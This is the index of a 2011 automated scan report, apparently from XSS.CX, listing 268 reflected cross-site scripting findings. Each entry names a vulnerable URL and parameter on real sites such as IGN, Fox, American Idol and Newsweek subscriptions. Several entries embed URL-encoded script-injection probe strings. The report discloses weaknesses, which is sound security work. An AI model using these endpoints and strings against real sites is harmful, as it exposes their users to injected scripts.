XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10052011-01

Report generated by XSS.CX at Wed Oct 05 09:00:35 CDT 2011.


1. Cross-site scripting (reflected)

1.1. http://1c6e2.v.fwmrm.net/ad/g/1 [asid parameter]

1.2. http://1c6e2.v.fwmrm.net/ad/g/1 [caid parameter]

1.3. http://1c6e2.v.fwmrm.net/ad/g/1 [csid parameter]

1.4. http://1c6e2.v.fwmrm.net/ad/g/1 [flag parameter]

1.5. http://1c6e2.v.fwmrm.net/ad/g/1 [pvrn parameter]

1.6. http://1c6e2.v.fwmrm.net/ad/g/1 [slid parameter]

1.7. http://1c6e2.v.fwmrm.net/ad/g/1 [slid parameter]

1.8. http://1c6e2.v.fwmrm.net/ad/g/1 [ssid parameter]

1.9. http://1c6e2.v.fwmrm.net/ad/g/1 [vprn parameter]

1.10. http://a.collective-media.net/adj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 2]

1.11. http://a.collective-media.net/adj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 3]

1.12. http://a.collective-media.net/adj/iblocal.3interactive.ron/n7061_728ros [kw parameter]

1.13. http://a.collective-media.net/adj/iblocal.3interactive.ron/n7061_728ros [name of an arbitrarily supplied request parameter]

1.14. http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 1]

1.15. http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 2]

1.16. http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 3]

1.17. http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros [kw parameter]

1.18. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter]

1.19. http://adsfac.eu/ag.asp [cc parameter]

1.20. http://adsfac.net/ag.asp [cc parameter]

1.21. http://api.echoenabled.com/api/v1/search [q parameter]

1.22. http://api.echoenabled.com/v1/search [q parameter]

1.23. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.24. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.25. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.26. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.27. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.28. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.29. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

1.30. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [callback parameter]

1.31. http://cdn-forums.scout.com/adfeed.ashx [callback parameter]

1.32. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter]

1.33. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter]

1.34. http://d7.zedo.com/jsc/d3/fl.js [p parameter]

1.35. http://link.theplatform.com/s/fox.com/JV5bOqASsrxR [REST URL parameter 1]

1.36. http://link.theplatform.com/s/fox.com/JV5bOqASsrxR [feed parameter]

1.37. http://link.theplatform.com/s/fox.com/JV5bOqASsrxR [format parameter]

1.38. http://media.sensis.com.au/hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939 [REST URL parameter 1]

1.39. http://media.sensis.com.au/hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939 [REST URL parameter 2]

1.40. http://media.sensis.com.au/hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939 [name of an arbitrarily supplied request parameter]

1.41. http://media.sensis.com.au/hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947 [REST URL parameter 1]

1.42. http://media.sensis.com.au/hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947 [REST URL parameter 2]

1.43. http://media.sensis.com.au/hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947 [name of an arbitrarily supplied request parameter]

1.44. http://media.sensis.com.au/hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]

1.45. http://media.sensis.com.au/hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]

1.46. http://media.sensis.com.au/hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]

1.47. http://media.sensis.com.au/hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]

1.48. http://media.sensis.com.au/hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]

1.49. http://media.sensis.com.au/hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]

1.50. http://media.sensis.com.au/hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]

1.51. http://media.sensis.com.au/hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]

1.52. http://media.sensis.com.au/hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]

1.53. http://media.sensis.com.au/hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]

1.54. http://media.sensis.com.au/hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]

1.55. http://media.sensis.com.au/hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]

1.56. http://media.sensis.com.au/hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]

1.57. http://media.sensis.com.au/hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]

1.58. http://media.sensis.com.au/hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]

1.59. http://media.sensis.com.au/hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]

1.60. http://media.sensis.com.au/hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]

1.61. http://media.sensis.com.au/hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]

1.62. http://my.careerone.com.au/services/adservices/getcommonadurl.ashx [applicationid parameter]

1.63. http://my.careerone.com.au/services/adservices/getcommonadurl.ashx [path parameter]

1.64. http://myidol.americanidol.com/ie7-styles.css [REST URL parameter 1]

1.65. http://myidol.americanidol.com/images/css/newforum.css [REST URL parameter 3]

1.66. http://myidol.americanidol.com/images/webfontkit/helveticaneuew02-75bold-webfont.woff [REST URL parameter 3]

1.67. http://myidol.americanidol.com/png_fix.css [REST URL parameter 1]

1.68. http://myidol.americanidol.com/tiny-edit.css [REST URL parameter 1]

1.69. http://pglb.buzzfed.com/32418/5cca846e8e7b10d1bec731ed34643e04 [callback parameter]

1.70. http://pglb.buzzfed.com/32418/774318d75531cfaededa3a9d2cbab383 [callback parameter]

1.71. http://pglb.buzzfed.com/39698/6d0094ff6569058b09e6fab4d74b9fcb [callback parameter]

1.72. http://pglb.buzzfed.com/39698/6f8f1f6be3a9e039f40348adbcc25b28 [callback parameter]

1.73. http://pglb.buzzfed.com/39698/f959d1ec5ce0f34205021b068f0f6899 [callback parameter]

1.74. http://social-services.ign.com/v1.0/social/rest/people/fedreg.150067215/@self [jsonp parameter]

1.75. http://social-services.ign.com/v1.0/social/rest/people/fedreg.233293577/@self [jsonp parameter]

1.76. http://social-services.ign.com/v1.0/social/rest/people/fedreg.259795679/@self [jsonp parameter]

1.77. http://social-services.ign.com/v1.0/social/rest/people/fedreg.78864510/@self [jsonp parameter]

1.78. http://social-services.ign.com/v1.0/social/rest/people/nickname.Interoceter%20/@self [jsonp parameter]

1.79. http://support.igninsider.com/ics/support/default.asp [name of an arbitrarily supplied request parameter]

1.80. http://trc.taboolasyndication.com/ign-askmen/trc/2/json [cb parameter]

1.81. http://widgets.ign.com/disqus/comment/comment/ign-articles/1197949.jsonp [callback parameter]

1.82. http://widgets.ign.com/global/page/followus.jsonp [callback parameter]

1.83. http://widgets.myidol.americanidol.com/js/recentActivity/view [REST URL parameter 1]

1.84. http://widgets.myidol.americanidol.com/js/recentActivity/view [REST URL parameter 2]

1.85. http://widgets.myidol.americanidol.com/js/recentActivity/view [REST URL parameter 3]

1.86. http://widgets.myidol.americanidol.com/js/recentActivity/view [cookieFailInstantRedirect parameter]

1.87. http://widgets.myidol.americanidol.com/js/recentActivity/view [devkey parameter]

1.88. http://widgets.myidol.americanidol.com/js/recentActivity/view [ms parameter]

1.89. http://widgets.myidol.americanidol.com/js/recentActivity/view [name of an arbitrarily supplied request parameter]

1.90. http://widgets.myidol.americanidol.com/js/recentActivity/view [num parameter]

1.91. http://widgets.myidol.americanidol.com/js/recentActivity/view [one_widget_node parameter]

1.92. http://widgets.myidol.americanidol.com/js/recentActivity/view [title parameter]

1.93. http://widgets.myidol.americanidol.com/js/recentActivity/view [view parameter]

1.94. http://widgets.myidol.americanidol.com/js/recentActivity/view [wurl parameter]

1.95. http://widgets.myidol.americanidol.com/redirect.one [redirect_to parameter]

1.96. http://widgets.myidol.americanidol.com/tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E [REST URL parameter 1]

1.97. http://widgets.myidol.americanidol.com/tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E [REST URL parameter 1]

1.98. http://widgets.myidol.americanidol.com/tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E [REST URL parameter 1]

1.99. http://widgets.myidol.americanidol.com/tools/Netsparkerdcf8046f3ca84302a46153adee19582b/ [REST URL parameter 1]

1.100. http://widgets.myidol.americanidol.com/tools/Netsparkerdcf8046f3ca84302a46153adee19582b/ [REST URL parameter 1]

1.101. http://widgets.myidol.americanidol.com/tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/ [REST URL parameter 1]

1.102. http://widgets.myidol.americanidol.com/tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/%EF%BF%BDw%1A%EF%BF%BD [REST URL parameter 1]

1.103. http://widgets.myidol.americanidol.com/tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/Netsparker8f4d94ef206e4e3b82c23a8a89d01567/ [REST URL parameter 1]

1.104. http://widgets.myidol.americanidol.com/tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E [REST URL parameter 1]

1.105. http://widgets.myidol.americanidol.com/tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E [REST URL parameter 1]

1.106. http://widgets.myidol.americanidol.com/tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E [REST URL parameter 1]

1.107. http://widgets.myidol.americanidol.com/tools/keyslave.one/%22ns=%22netsparker(0x00004A) [REST URL parameter 1]

1.108. http://widgets.myidol.americanidol.com/tools/keyslave.one/%22ns=%22netsparker(0x00004A) [REST URL parameter 1]

1.109. http://widgets.myidol.americanidol.com/tools/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529) [REST URL parameter 1]

1.110. http://widgets.myidol.americanidol.com/tools/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529) [REST URL parameter 1]

1.111. http://wrapper.askmen.com/a [name of an arbitrarily supplied request parameter]

1.112. http://wrapper.ign.com/a [name of an arbitrarily supplied request parameter]

1.113. http://wrapper.ign.com/a [pagetype parameter]

1.114. http://www.americanidol.com/photos/hothome/ [all parameter]

1.115. http://www.americanidol.com/photos/hothome/ [feed parameter]

1.116. http://www.americanidol.com/photos/hothome/ [name of an arbitrarily supplied request parameter]

1.117. http://www.americanidol.com/videos/hot/qty/12 [REST URL parameter 3]

1.118. http://www.americanidol.com/videos/hot/qty/12 [REST URL parameter 4]

1.119. http://www.americanidol.com/videos/hot/qty/12 [dfpzone parameter]

1.120. http://www.americanidol.com/videos/hot/qty/12 [feed parameter]

1.121. http://www.americanidol.com/videos/hot/qty/12 [name of an arbitrarily supplied request parameter]

1.122. http://www.americanidol.com/videos/hot/qty/12/ [REST URL parameter 3]

1.123. http://www.americanidol.com/videos/hot/qty/12/ [REST URL parameter 4]

1.124. http://www.americanidol.com/videos/hot/qty/12/ [feed parameter]

1.125. http://www.americanidol.com/videos/hot/qty/12/ [name of an arbitrarily supplied request parameter]

1.126. http://www.askmen.com/api/articles/getTodaysArticles/country:us.json&ttl=86400&jsoncallback=jQuery16105530000370927155_1317758809762 [REST URL parameter 1]

1.127. http://www.askmen.com/includes/js/am/min.php [REST URL parameter 1]

1.128. http://www.askmen.com/includes/js/am/min.php [REST URL parameter 2]

1.129. http://www.askmen.com/includes/js/am/min.php [REST URL parameter 3]

1.130. http://www.askmen.com/includes/js/am/min.php [REST URL parameter 4]

1.131. http://www.askmen.com/includes/views/helpers/cache.php [REST URL parameter 1]

1.132. http://www.askmen.com/includes/views/helpers/cache.php [REST URL parameter 2]

1.133. http://www.askmen.com/includes/views/helpers/cache.php [REST URL parameter 3]

1.134. http://www.askmen.com/includes/views/helpers/cache.php [REST URL parameter 4]

1.135. http://www.askmen.com/includes/views/helpers/cache.php [jsoncallback parameter]

1.136. http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html [REST URL parameter 1]

1.137. http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html [REST URL parameter 2]

1.138. http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html [REST URL parameter 3]

1.139. http://www.carsguide.com.au/search/ [name of an arbitrarily supplied request parameter]

1.140. http://www.carsguide.com.au/search/ [name of an arbitrarily supplied request parameter]

1.141. http://www.carsguide.com.au/search/ [name of an arbitrarily supplied request parameter]

1.142. http://www.carsguide.com.au/search/ [name of an arbitrarily supplied request parameter]

1.143. http://www.carsguide.com.au/search/ [origin parameter]

1.144. http://www.carsguide.com.au/search/ [origin parameter]

1.145. http://www.carsguide.com.au/search/ [origin parameter]

1.146. http://www.carsguide.com.au/search/ [origin parameter]

1.147. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-4.xml [REST URL parameter 1]

1.148. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-4.xml [REST URL parameter 2]

1.149. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-4.xml [REST URL parameter 3]

1.150. http://www.fox.com/_ui/fox_player/swf/FoxAnalyticsExtension.swf [REST URL parameter 1]

1.151. http://www.fox.com/_ui/fox_player/swf/FoxAnalyticsExtension.swf [REST URL parameter 2]

1.152. http://www.fox.com/_ui/fox_player/swf/FoxAnalyticsExtension.swf [REST URL parameter 3]

1.153. http://www.fox.com/_ui/fox_player/swf/FoxLayoutPlugIn.swf [REST URL parameter 1]

1.154. http://www.fox.com/_ui/fox_player/swf/FoxLayoutPlugIn.swf [REST URL parameter 2]

1.155. http://www.fox.com/_ui/fox_player/swf/FoxLayoutPlugIn.swf [REST URL parameter 3]

1.156. http://www.fox.com/_ui/fox_player/swf/FoxOmnitureMonitor.swf [REST URL parameter 1]

1.157. http://www.fox.com/_ui/fox_player/swf/FoxOmnitureMonitor.swf [REST URL parameter 2]

1.158. http://www.fox.com/_ui/fox_player/swf/FoxOmnitureMonitor.swf [REST URL parameter 3]

1.159. http://www.fox.com/_ui/fox_player/swf/akamaiHD.swf [REST URL parameter 1]

1.160. http://www.fox.com/_ui/fox_player/swf/akamaiHD.swf [REST URL parameter 2]

1.161. http://www.fox.com/_ui/fox_player/swf/akamaiHD.swf [REST URL parameter 3]

1.162. http://www.fox.com/_ui/fox_player/swf/authentication.swf [REST URL parameter 1]

1.163. http://www.fox.com/_ui/fox_player/swf/authentication.swf [REST URL parameter 2]

1.164. http://www.fox.com/_ui/fox_player/swf/authentication.swf [REST URL parameter 3]

1.165. http://www.fox.com/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf [REST URL parameter 1]

1.166. http://www.fox.com/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf [REST URL parameter 2]

1.167. http://www.fox.com/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf [REST URL parameter 3]

1.168. http://www.fox.com/_ui/fox_player/swf/foxUrlSigningPlugIn.swf [REST URL parameter 1]

1.169. http://www.fox.com/_ui/fox_player/swf/foxUrlSigningPlugIn.swf [REST URL parameter 2]

1.170. http://www.fox.com/_ui/fox_player/swf/foxUrlSigningPlugIn.swf [REST URL parameter 3]

1.171. http://www.fox.com/_ui/fox_player/swf/ggtp370.swf [REST URL parameter 1]

1.172. http://www.fox.com/_ui/fox_player/swf/ggtp370.swf [REST URL parameter 2]

1.173. http://www.fox.com/_ui/fox_player/swf/ggtp370.swf [REST URL parameter 3]

1.174. http://www.fox.com/_ui/fox_player/swf/omnitureMedia.swf [REST URL parameter 1]

1.175. http://www.fox.com/_ui/fox_player/swf/omnitureMedia.swf [REST URL parameter 2]

1.176. http://www.fox.com/_ui/fox_player/swf/omnitureMedia.swf [REST URL parameter 3]

1.177. http://www.fox.com/_ui/fox_player/videoXml.php [REST URL parameter 1]

1.178. http://www.fox.com/_ui/fox_player/videoXml.php [REST URL parameter 2]

1.179. http://www.fox.com/_ui/js/combinedjs.php [REST URL parameter 1]

1.180. http://www.fox.com/_ui/js/combinedjs.php [REST URL parameter 2]

1.181. http://www.ign.com/ [name of an arbitrarily supplied request parameter]

1.182. http://www.ign.com/ [name of an arbitrarily supplied request parameter]

1.183. http://www.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.184. http://www.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.185. http://www.ign.com/videos/2011/08/15/batman-arkham-city-mr-freeze-trailer [name of an arbitrarily supplied request parameter]

1.186. http://www.ign.com/videos/2011/08/31/uncharted-3-drakes-deception-cargo-plane-demo-part-2 [name of an arbitrarily supplied request parameter]

1.187. http://www.ign.com/videos/2011/09/15/rage-launch-trailer [name of an arbitrarily supplied request parameter]

1.188. http://www.ign.com/videos/2011/09/16/battlefield-3-operation-guillotine-gameplay-trailer [name of an arbitrarily supplied request parameter]

1.189. http://www.newsspace.com.au/digital [REST URL parameter 1]

1.190. http://www.newsspace.com.au/digital [REST URL parameter 1]

1.191. http://www.newsspace.com.au/news.com.au [REST URL parameter 1]

1.192. http://www.newsspace.com.au/news.com.au [REST URL parameter 1]

1.193. https://www.newsweeksubscriptions.com/4freetrial29/index.php [REST URL parameter 1]

1.194. https://www.newsweeksubscriptions.com/4freetrial29/index.php [REST URL parameter 2]

1.195. https://www.newsweeksubscriptions.com/4freetrial29/index.php [name of an arbitrarily supplied request parameter]

1.196. https://www.newsweeksubscriptions.com/4freetrial29/index.php [name of an arbitrarily supplied request parameter]

1.197. https://www.newsweeksubscriptions.com/4freetrial29/index.php [off2on_code parameter]

1.198. https://www.newsweeksubscriptions.com/4freetrial29/index.php [off2on_code parameter]

1.199. https://www.newsweeksubscriptions.com/4freetrial29/index.php [off2on_login_url parameter]

1.200. https://www.newsweeksubscriptions.com/4freetrial29/index.php [off2on_login_url parameter]

1.201. https://www.newsweeksubscriptions.com/702FT [REST URL parameter 1]

1.202. https://www.newsweeksubscriptions.com/FTcontrol/ [REST URL parameter 1]

1.203. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com [REST URL parameter 1]

1.204. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com [REST URL parameter 2]

1.205. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com [REST URL parameter 1]

1.206. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com [REST URL parameter 2]

1.207. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php [REST URL parameter 1]

1.208. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php [REST URL parameter 2]

1.209. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php [name of an arbitrarily supplied request parameter]

1.210. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a/ [REST URL parameter 1]

1.211. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a/ [REST URL parameter 2]

1.212. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc/ [REST URL parameter 1]

1.213. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc/ [REST URL parameter 2]

1.214. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com [REST URL parameter 1]

1.215. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com [REST URL parameter 2]

1.216. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php [REST URL parameter 1]

1.217. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php [REST URL parameter 2]

1.218. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php [name of an arbitrarily supplied request parameter]

1.219. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1/ [REST URL parameter 1]

1.220. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1/ [REST URL parameter 2]

1.221. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php [REST URL parameter 1]

1.222. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php [REST URL parameter 2]

1.223. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php [name of an arbitrarily supplied request parameter]

1.224. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 1]

1.225. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 1]

1.226. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 2]

1.227. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 2]

1.228. https://www.newsweeksubscriptions.com/FTcontrol/index.php [address parameter]

1.229. https://www.newsweeksubscriptions.com/FTcontrol/index.php [address2 parameter]

1.230. https://www.newsweeksubscriptions.com/FTcontrol/index.php [city parameter]

1.231. https://www.newsweeksubscriptions.com/FTcontrol/index.php [name of an arbitrarily supplied request parameter]

1.232. https://www.newsweeksubscriptions.com/FTcontrol/index.php [name of an arbitrarily supplied request parameter]

1.233. https://www.newsweeksubscriptions.com/FTcontrol/index.php [name parameter]

1.234. https://www.newsweeksubscriptions.com/FTcontrol/index.php [off2on_code parameter]

1.235. https://www.newsweeksubscriptions.com/FTcontrol/index.php [off2on_code parameter]

1.236. https://www.newsweeksubscriptions.com/FTcontrol/index.php [off2on_login_url parameter]

1.237. https://www.newsweeksubscriptions.com/FTcontrol/index.php [off2on_login_url parameter]

1.238. https://www.newsweeksubscriptions.com/FTcontrol/index.php [paym parameter]

1.239. https://www.newsweeksubscriptions.com/FTcontrol/index.php [sessid parameter]

1.240. https://www.newsweeksubscriptions.com/FTcontrol/index.php [state parameter]

1.241. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com [REST URL parameter 1]

1.242. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com [REST URL parameter 2]

1.243. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/ [REST URL parameter 1]

1.244. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/ [REST URL parameter 2]

1.245. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/ [REST URL parameter 1]

1.246. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/ [REST URL parameter 2]

1.247. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/ [REST URL parameter 3]

1.248. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/ [REST URL parameter 1]

1.249. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/ [REST URL parameter 2]

1.250. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/ [REST URL parameter 3]

1.251. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/ [REST URL parameter 1]

1.252. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/ [REST URL parameter 2]

1.253. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/ [REST URL parameter 3]

1.254. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/ [REST URL parameter 1]

1.255. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/ [REST URL parameter 2]

1.256. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker3215122ba390411b8fddefdc9096119b/ [REST URL parameter 1]

1.257. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker3215122ba390411b8fddefdc9096119b/ [REST URL parameter 2]

1.258. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker3215122ba390411b8fddefdc9096119b/ [REST URL parameter 3]

1.259. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker3488b5ca6f704b4db379c689563ca325/ [REST URL parameter 1]

1.260. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker3488b5ca6f704b4db379c689563ca325/ [REST URL parameter 2]

1.261. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker3488b5ca6f704b4db379c689563ca325/ [REST URL parameter 3]

1.262. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker37c19d3edd97406aa7aeff8e0b4b8858 [REST URL parameter 1]

1.263. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker37c19d3edd97406aa7aeff8e0b4b8858 [REST URL parameter 2]

1.264. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker37c19d3edd97406aa7aeff8e0b4b8858 [REST URL parameter 3]

1.265. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker88468e5892914e859ede199ce9b7be76/ [REST URL parameter 1]

1.266. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker88468e5892914e859ede199ce9b7be76/ [REST URL parameter 2]

1.267. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker88468e5892914e859ede199ce9b7be76/ [REST URL parameter 3]

1.268. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparkera4a3dcc1dec5482fa45c61e8ff59fecd [REST URL parameter 1]

